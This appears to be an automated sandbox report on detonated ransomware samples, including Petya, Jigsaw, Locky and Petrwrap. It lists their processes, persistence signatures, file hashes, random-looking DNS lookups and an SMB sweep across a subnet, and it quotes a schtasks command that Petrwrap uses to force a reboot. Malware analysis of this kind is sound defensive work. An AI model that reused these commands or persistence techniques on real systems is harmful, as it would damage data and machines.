US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp

Files

Analysis: behavioral9

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win7-20240221-en

Max time kernel

1565s

Max time network

1568s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Mamba\131.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Mamba\131.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Mamba\131.exe"

Network

N/A

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win10v2004-20240508-en

Max time kernel

1720s

Max time network

1733s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2420 -ip 2420

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2420 -s 368

Network

Files

N/A

Analysis: behavioral26

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:00

Platform

win10v2004-20240508-en

Max time kernel

2s

Max time network

9s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739.exe"

Signatures

Writes to the Master Boot Record (MBR)

bootkit persistence

Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp

Files

memory/4308-0-0x000000000041A000-0x0000000000427000-memory.dmp

memory/4308-1-0x0000000000400000-0x000000000043F000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win7-20240508-en

Max time kernel

1561s

Max time network

1562s

Command Line

"C:\Users\Admin\AppData\Local\Temp\out.exe"

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\out.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2984 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\out.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\out.exe

"C:\Users\Admin\AppData\Local\Temp\out.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 36

Network

N/A

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win7-20240611-en

Max time kernel

1790s

Max time network

1790s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Locky\Locky.exe"

Signatures

Locky

ransomware locky

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Locky\Locky.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Locky\Locky.exe"

Network

Country Destination Domain Proto

Files

Analysis: behavioral5

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win7-20240508-en

Max time kernel

1800s

Max time network

1564s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Jigsaw\jigsaw.exe"

Signatures

Jigsaw Ransomware

ransomware jigsaw

Renames multiple (2015) files with added filename extension

ransomware

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Jigsaw\jigsaw.exe N/A

Drops file in Program Files directory

Description Indicator Process Target

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Jigsaw\jigsaw.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Jigsaw\jigsaw.exe"

C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe

"C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe" C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Jigsaw\jigsaw.exe

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\system32\Dwm.exe

"C:\Windows\system32\Dwm.exe"

Network

N/A

Files

memory/2604-0-0x000007FEF535E000-0x000007FEF535F000-memory.dmp

memory/2604-1-0x0000000000460000-0x0000000000498000-memory.dmp

memory/2604-2-0x000007FEF50A0000-0x000007FEF5A3D000-memory.dmp

memory/2604-6-0x000007FEF50A0000-0x000007FEF5A3D000-memory.dmp

C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe

MD5 2773e3dc59472296cb0024ba7715a64e
SHA1 27d99fbca067f478bb91cdbcb92f13a828b00859
SHA256 3ae96f73d805e1d3995253db4d910300d8442ea603737a1428b613061e7f61e7
SHA512 6ef530b209f8ec459cca66dbf2c31ec96c5f7d609f17fa3b877d276968032fbc6132ea4a45ed1450fb6c5d730a7c9349bf4481e28befaea6b119ec0ded842262

memory/1860-11-0x000007FEF50A0000-0x000007FEF5A3D000-memory.dmp

memory/2604-10-0x000007FEF50A0000-0x000007FEF5A3D000-memory.dmp

memory/1860-12-0x000007FEF50A0000-0x000007FEF5A3D000-memory.dmp

memory/1860-13-0x000007FEF50A0000-0x000007FEF5A3D000-memory.dmp

memory/1860-248-0x000007FEF50A0000-0x000007FEF5A3D000-memory.dmp

C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\invalid32x32.gif.fun

MD5 580ee0344b7da2786da6a433a1e84893
SHA1 60f8c4dd5457e9834f5402cb326b1a2d3ca0ba7e
SHA256 98b6c2ddfefc628d03ceaef9d69688674a6bc32eb707f9ed86bc8c75675c4513
SHA512 356d2cdea3321e894b5b46ad1ea24c0e3c8be8e3c454b5bd300b7340cbb454e71fc89ca09ea0785b373b483e67c2f6f6bb408e489b0de4ff82d5ed69a75613ba

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\container.dat.fun

MD5 8ebcc5ca5ac09a09376801ecdd6f3792
SHA1 81187142b138e0245d5d0bc511f7c46c30df3e14
SHA256 619e246fc0ac11320ff9e322a979948d949494b0c18217f4d794e1b398818880
SHA512 cec50bfc6ad2f57f16da99459f40f2d424c6d5691685fa1053284f46c8c8c8a975d7bcb1f3521c4f3fbdc310cf4714e29404aa23be6021e2e267c97b090dc650

memory/1860-2037-0x000007FEF50A0000-0x000007FEF5A3D000-memory.dmp

memory/1860-2040-0x000007FEF50A0000-0x000007FEF5A3D000-memory.dmp

memory/2924-2041-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/2924-2042-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/2924-2043-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/2924-2044-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/1860-2045-0x000007FEF50A0000-0x000007FEF5A3D000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win7-20240419-en

Max time kernel

1799s

Max time network

1800s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\027cc450ef5f8c5f653329641ec1fed9.dll,#1

Signatures

Mimikatz

mimikatz

mimikatz is an open source tool to dump credentials on Windows

Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\202E.tmp N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Writes to the Master Boot Record (MBR)

bootkit persistence

Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Program Files directory

Description Indicator Process Target

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\027cc450ef5f8c5f653329641ec1fed9 C:\Windows\SysWOW64\rundll32.exe N/A
File created C:\Windows\dllhost.dat C:\Windows\SysWOW64\rundll32.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\202E.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2032 wrote to memory of 1144 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1144 wrote to memory of 2256 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\cmd.exe
PID 1144 wrote to memory of 2700 N/A C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\202E.tmp
PID 2256 wrote to memory of 2740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\027cc450ef5f8c5f653329641ec1fed9.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\027cc450ef5f8c5f653329641ec1fed9.dll,#1

C:\Windows\SysWOW64\cmd.exe

/c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 02:03

C:\Users\Admin\AppData\Local\Temp\202E.tmp

"C:\Users\Admin\AppData\Local\Temp\202E.tmp" \\.\pipe\{4A5FD4FC-5F3C-4E90-A8BC-D1C788D247F5}

C:\Windows\SysWOW64\schtasks.exe

schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 02:03

Network

Country Destination Domain Proto
N/A 10.127.0.136:445 tcp
N/A 10.127.0.136:139 tcp
N/A 10.127.0.137:445 tcp
N/A 10.127.0.137:139 tcp
N/A 10.127.0.138:445 tcp
N/A 10.127.0.138:139 tcp
N/A 10.127.0.139:445 tcp
N/A 10.127.0.139:139 tcp
N/A 10.127.0.140:445 tcp
N/A 10.127.0.140:139 tcp
N/A 10.127.0.141:445 tcp
N/A 10.127.0.141:139 tcp
N/A 10.127.0.142:445 tcp
N/A 10.127.0.142:139 tcp
N/A 10.127.0.143:445 tcp
N/A 10.127.0.143:139 tcp
N/A 10.127.0.144:445 tcp
N/A 10.127.0.144:139 tcp
N/A 10.127.0.145:445 tcp
N/A 10.127.0.145:139 tcp
N/A 10.127.0.146:445 tcp
N/A 10.127.0.146:139 tcp
N/A 10.127.0.147:445 tcp
N/A 10.127.0.147:139 tcp
N/A 10.127.0.148:445 tcp
N/A 10.127.0.148:139 tcp
N/A 10.127.0.149:445 tcp
N/A 10.127.0.149:139 tcp
N/A 10.127.0.150:445 tcp
N/A 10.127.0.150:139 tcp
N/A 10.127.0.151:445 tcp
N/A 10.127.0.151:139 tcp
N/A 10.127.0.152:445 tcp
N/A 10.127.0.152:139 tcp
N/A 10.127.0.153:445 tcp
N/A 10.127.0.153:139 tcp
N/A 10.127.0.154:445 tcp
N/A 10.127.0.154:139 tcp
N/A 10.127.0.155:445 tcp
N/A 10.127.0.155:139 tcp
N/A 10.127.0.156:445 tcp
N/A 10.127.0.156:139 tcp
N/A 10.127.0.157:445 tcp
N/A 10.127.0.157:139 tcp
N/A 10.127.0.158:445 tcp
N/A 10.127.0.158:139 tcp
N/A 10.127.0.159:445 tcp
N/A 10.127.0.159:139 tcp
N/A 10.127.0.160:445 tcp
N/A 10.127.0.160:139 tcp
N/A 10.127.0.161:445 tcp
N/A 10.127.0.161:139 tcp
N/A 10.127.0.162:445 tcp
N/A 10.127.0.162:139 tcp
N/A 10.127.0.163:445 tcp
N/A 10.127.0.163:139 tcp
N/A 10.127.0.164:445 tcp
N/A 10.127.0.164:139 tcp
N/A 10.127.0.165:445 tcp
N/A 10.127.0.165:139 tcp
N/A 10.127.0.166:445 tcp
N/A 10.127.0.166:139 tcp
N/A 10.127.0.167:445 tcp
N/A 10.127.0.167:139 tcp
N/A 10.127.0.168:445 tcp
N/A 10.127.0.168:139 tcp
N/A 10.127.0.169:445 tcp
N/A 10.127.0.169:139 tcp
N/A 10.127.0.170:445 tcp
N/A 10.127.0.170:139 tcp
N/A 10.127.0.171:445 tcp
N/A 10.127.0.171:139 tcp
N/A 10.127.0.172:445 tcp
N/A 10.127.0.172:139 tcp
N/A 10.127.0.173:445 tcp
N/A 10.127.0.173:139 tcp
N/A 10.127.0.174:445 tcp
N/A 10.127.0.174:139 tcp
N/A 10.127.0.175:445 tcp
N/A 10.127.0.175:139 tcp
N/A 10.127.0.176:445 tcp
N/A 10.127.0.176:139 tcp
N/A 10.127.0.177:445 tcp
N/A 10.127.0.177:139 tcp
N/A 10.127.0.178:445 tcp
N/A 10.127.0.178:139 tcp
N/A 10.127.0.179:445 tcp
N/A 10.127.0.179:139 tcp
N/A 10.127.0.180:445 tcp
N/A 10.127.0.180:139 tcp
N/A 10.127.0.181:445 tcp
N/A 10.127.0.181:139 tcp
N/A 10.127.0.182:445 tcp
N/A 10.127.0.182:139 tcp
N/A 10.127.0.183:445 tcp
N/A 10.127.0.183:139 tcp
N/A 10.127.0.184:445 tcp
N/A 10.127.0.184:139 tcp
N/A 10.127.0.185:445 tcp
N/A 10.127.0.185:139 tcp
N/A 10.127.0.186:445 tcp
N/A 10.127.0.186:139 tcp
N/A 10.127.0.187:445 tcp
N/A 10.127.0.187:139 tcp
N/A 10.127.0.188:445 tcp
N/A 10.127.0.188:139 tcp
N/A 10.127.0.189:445 tcp
N/A 10.127.0.189:139 tcp
N/A 10.127.0.190:445 tcp
N/A 10.127.0.190:139 tcp
N/A 10.127.0.191:445 tcp
N/A 10.127.0.191:139 tcp
N/A 10.127.0.192:445 tcp
N/A 10.127.0.192:139 tcp
N/A 10.127.0.193:445 tcp
N/A 10.127.0.193:139 tcp
N/A 10.127.0.194:445 tcp
N/A 10.127.0.194:139 tcp
N/A 10.127.0.195:445 tcp
N/A 10.127.0.195:139 tcp
N/A 10.127.0.196:445 tcp
N/A 10.127.0.196:139 tcp
N/A 10.127.0.197:445 tcp
N/A 10.127.0.197:139 tcp
N/A 10.127.0.198:445 tcp
N/A 10.127.0.198:139 tcp
N/A 10.127.0.199:445 tcp
N/A 10.127.0.199:139 tcp
N/A 10.127.0.200:445 tcp
N/A 10.127.0.200:139 tcp
N/A 10.127.0.201:445 tcp
N/A 10.127.0.201:139 tcp
N/A 10.127.0.202:445 tcp
N/A 10.127.0.202:139 tcp
N/A 10.127.0.203:445 tcp
N/A 10.127.0.203:139 tcp
N/A 10.127.0.204:445 tcp
N/A 10.127.0.204:139 tcp
N/A 10.127.0.205:445 tcp
N/A 10.127.0.205:139 tcp
N/A 10.127.0.206:445 tcp
N/A 10.127.0.206:139 tcp
N/A 10.127.0.207:445 tcp
N/A 10.127.0.207:139 tcp
N/A 10.127.0.208:445 tcp
N/A 10.127.0.209:445 tcp
N/A 10.127.0.209:139 tcp
N/A 10.127.0.210:445 tcp
N/A 10.127.0.210:139 tcp
N/A 10.127.0.211:445 tcp
N/A 10.127.0.211:139 tcp
N/A 10.127.0.212:445 tcp
N/A 10.127.0.212:139 tcp
N/A 10.127.0.213:445 tcp
N/A 10.127.0.213:139 tcp
N/A 10.127.0.214:445 tcp
N/A 10.127.0.214:139 tcp
N/A 10.127.0.215:445 tcp
N/A 10.127.0.215:139 tcp
N/A 10.127.0.216:445 tcp
N/A 10.127.0.216:139 tcp
N/A 10.127.0.217:445 tcp
N/A 10.127.0.217:139 tcp
N/A 10.127.0.218:445 tcp
N/A 10.127.0.218:139 tcp
N/A 10.127.0.219:445 tcp
N/A 10.127.0.219:139 tcp
N/A 10.127.0.220:445 tcp
N/A 10.127.0.220:139 tcp
N/A 10.127.0.221:445 tcp
N/A 10.127.0.221:139 tcp
N/A 10.127.0.222:445 tcp
N/A 10.127.0.222:139 tcp
N/A 10.127.0.223:445 tcp
N/A 10.127.0.223:139 tcp
N/A 10.127.0.224:445 tcp
N/A 10.127.0.224:139 tcp
N/A 10.127.0.225:445 tcp
N/A 10.127.0.225:139 tcp
N/A 10.127.0.226:445 tcp
N/A 10.127.0.226:139 tcp
N/A 10.127.0.227:445 tcp
N/A 10.127.0.227:139 tcp
N/A 10.127.0.228:445 tcp
N/A 10.127.0.228:139 tcp
N/A 10.127.0.229:445 tcp
N/A 10.127.0.229:139 tcp
N/A 10.127.0.230:445 tcp
N/A 10.127.0.230:139 tcp
N/A 10.127.0.231:445 tcp
N/A 10.127.0.231:139 tcp
N/A 10.127.0.232:445 tcp
N/A 10.127.0.232:139 tcp
N/A 10.127.0.233:445 tcp
N/A 10.127.0.233:139 tcp
N/A 10.127.0.234:445 tcp
N/A 10.127.0.234:139 tcp
N/A 10.127.0.235:445 tcp
N/A 10.127.0.235:139 tcp
N/A 10.127.0.236:445 tcp
N/A 10.127.0.236:139 tcp
N/A 10.127.0.237:445 tcp
N/A 10.127.0.237:139 tcp
N/A 10.127.0.238:445 tcp
N/A 10.127.0.238:139 tcp
N/A 10.127.0.239:445 tcp
N/A 10.127.0.239:139 tcp
N/A 10.127.0.240:445 tcp
N/A 10.127.0.240:139 tcp
N/A 10.127.0.241:445 tcp
N/A 10.127.0.241:139 tcp
N/A 10.127.0.242:445 tcp
N/A 10.127.0.242:139 tcp
N/A 10.127.0.243:445 tcp
N/A 10.127.0.243:139 tcp
N/A 10.127.0.244:445 tcp
N/A 10.127.0.244:139 tcp
N/A 10.127.0.245:445 tcp
N/A 10.127.0.245:139 tcp
N/A 10.127.0.246:445 tcp
N/A 10.127.0.246:139 tcp
N/A 10.127.0.247:445 tcp
N/A 10.127.0.247:139 tcp
N/A 10.127.0.248:445 tcp
N/A 10.127.0.248:139 tcp
N/A 10.127.0.249:445 tcp
N/A 10.127.0.249:139 tcp
N/A 10.127.0.250:445 tcp
N/A 10.127.0.250:139 tcp
N/A 10.127.0.251:445 tcp
N/A 10.127.0.251:139 tcp
N/A 10.127.0.252:445 tcp
N/A 10.127.0.252:139 tcp
N/A 10.127.0.253:445 tcp
N/A 10.127.0.253:139 tcp
N/A 10.127.0.254:445 tcp
N/A 10.127.0.254:139 tcp
N/A 10.127.0.255:445 tcp
N/A 10.127.0.255:139 tcp
N/A 10.127.1.0:445 tcp
N/A 10.127.1.0:139 tcp
N/A 10.127.1.1:445 tcp
N/A 10.127.1.1:139 tcp
N/A 10.127.1.2:445 tcp
N/A 10.127.1.2:139 tcp
N/A 10.127.1.3:445 tcp
N/A 10.127.1.3:139 tcp
N/A 10.127.1.4:445 tcp
N/A 10.127.1.4:139 tcp
N/A 10.127.1.5:445 tcp
N/A 10.127.1.5:139 tcp
N/A 10.127.1.6:445 tcp
N/A 10.127.1.6:139 tcp
N/A 10.127.1.7:445 tcp
N/A 10.127.1.7:139 tcp
N/A 10.127.1.8:445 tcp
N/A 10.127.1.8:139 tcp
N/A 10.127.1.9:445 tcp
N/A 10.127.1.9:139 tcp
N/A 10.127.1.10:445 tcp
N/A 10.127.1.10:139 tcp
N/A 10.127.1.11:445 tcp
N/A 10.127.1.11:139 tcp
N/A 10.127.1.12:445 tcp
N/A 10.127.1.12:139 tcp
N/A 10.127.1.13:445 tcp
N/A 10.127.1.13:139 tcp
N/A 10.127.1.14:445 tcp
N/A 10.127.1.14:139 tcp
N/A 10.127.1.15:445 tcp
N/A 10.127.1.15:139 tcp
N/A 10.127.1.16:445 tcp
N/A 10.127.1.16:139 tcp
N/A 10.127.1.17:445 tcp
N/A 10.127.1.17:139 tcp
N/A 10.127.1.18:445 tcp
N/A 10.127.1.18:139 tcp
N/A 10.127.1.19:445 tcp
N/A 10.127.1.19:139 tcp
N/A 10.127.1.20:445 tcp
N/A 10.127.1.20:139 tcp
N/A 10.127.1.21:445 tcp
N/A 10.127.1.21:139 tcp
N/A 10.127.1.22:445 tcp
N/A 10.127.1.22:139 tcp
N/A 10.127.1.23:445 tcp
N/A 10.127.1.23:139 tcp
N/A 10.127.1.24:445 tcp
N/A 10.127.1.24:139 tcp
N/A 10.127.1.25:445 tcp
N/A 10.127.1.25:139 tcp
N/A 10.127.1.26:445 tcp
N/A 10.127.1.26:139 tcp
N/A 10.127.1.27:445 tcp
N/A 10.127.1.27:139 tcp
N/A 10.127.1.28:445 tcp
N/A 10.127.1.28:139 tcp
N/A 10.127.1.29:445 tcp
N/A 10.127.1.29:139 tcp
N/A 10.127.1.30:445 tcp
N/A 10.127.1.30:139 tcp
N/A 10.127.1.31:445 tcp
N/A 10.127.1.31:139 tcp
N/A 10.127.1.32:445 tcp
N/A 10.127.1.32:139 tcp
N/A 10.127.1.33:445 tcp
N/A 10.127.1.33:139 tcp
N/A 10.127.1.34:445 tcp
N/A 10.127.1.34:139 tcp
N/A 10.127.1.35:445 tcp
N/A 10.127.1.35:139 tcp
N/A 10.127.1.36:445 tcp
N/A 10.127.1.36:139 tcp
N/A 10.127.1.37:445 tcp
N/A 10.127.1.37:139 tcp
N/A 10.127.1.38:445 tcp
N/A 10.127.1.38:139 tcp
N/A 10.127.1.39:445 tcp
N/A 10.127.1.39:139 tcp
N/A 10.127.1.40:445 tcp
N/A 10.127.1.40:139 tcp
N/A 10.127.1.41:445 tcp
N/A 10.127.1.41:139 tcp
N/A 10.127.1.42:445 tcp
N/A 10.127.1.42:139 tcp
N/A 10.127.1.43:445 tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.1.43:139 tcp
N/A 10.127.1.44:445 tcp
N/A 10.127.1.44:139 tcp
N/A 10.127.1.45:445 tcp
N/A 10.127.1.45:139 tcp
N/A 10.127.1.46:445 tcp
DE 136.243.76.21:445 tcp
N/A 10.127.1.46:139 tcp
N/A 10.127.1.47:445 tcp
N/A 10.127.1.47:139 tcp
N/A 10.127.1.48:445 tcp
N/A 10.127.1.48:139 tcp
N/A 10.127.1.49:445 tcp
N/A 10.127.1.49:139 tcp
N/A 10.127.0.0:445 tcp
N/A 10.127.1.50:445 tcp
N/A 10.127.1.50:139 tcp
N/A 10.127.1.51:445 tcp
N/A 10.127.1.51:139 tcp
